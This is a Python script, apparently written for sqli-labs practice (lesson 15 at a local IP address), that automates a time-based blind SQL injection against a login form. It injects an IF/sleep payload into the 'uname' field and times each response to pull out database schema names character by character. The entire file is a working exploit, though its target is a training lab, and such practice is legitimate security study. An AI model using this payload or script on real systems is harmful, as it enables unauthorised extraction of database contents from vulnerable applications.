#also it's work now!but it's not entirely to use...
import requests,datetime
url = "http://192.168.1.5/sqli-labs/sqli-labs/Less-15/"
char = "abcdefghijklmnopqrstuvwxyz_"
print("start!")
for i in range(0,10):
    database = ""
    for j in range(1,20):
        for str in char:
            # print(str)
            time1 = datetime.datetime.now()
            data = {'uname':"admin'and If((mid((select schema_name from information_schema.schemata limit %d,1),%d,1))='%s',1,sleep(5))#"%(i,j,str),'passwd':"1"}
            res = requests.post(url,data=data)
            # print(res.text)
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec<4:
                database += str
                print(database)
                break
    print("the %d database: "%i)
    print(database)
print("end!")
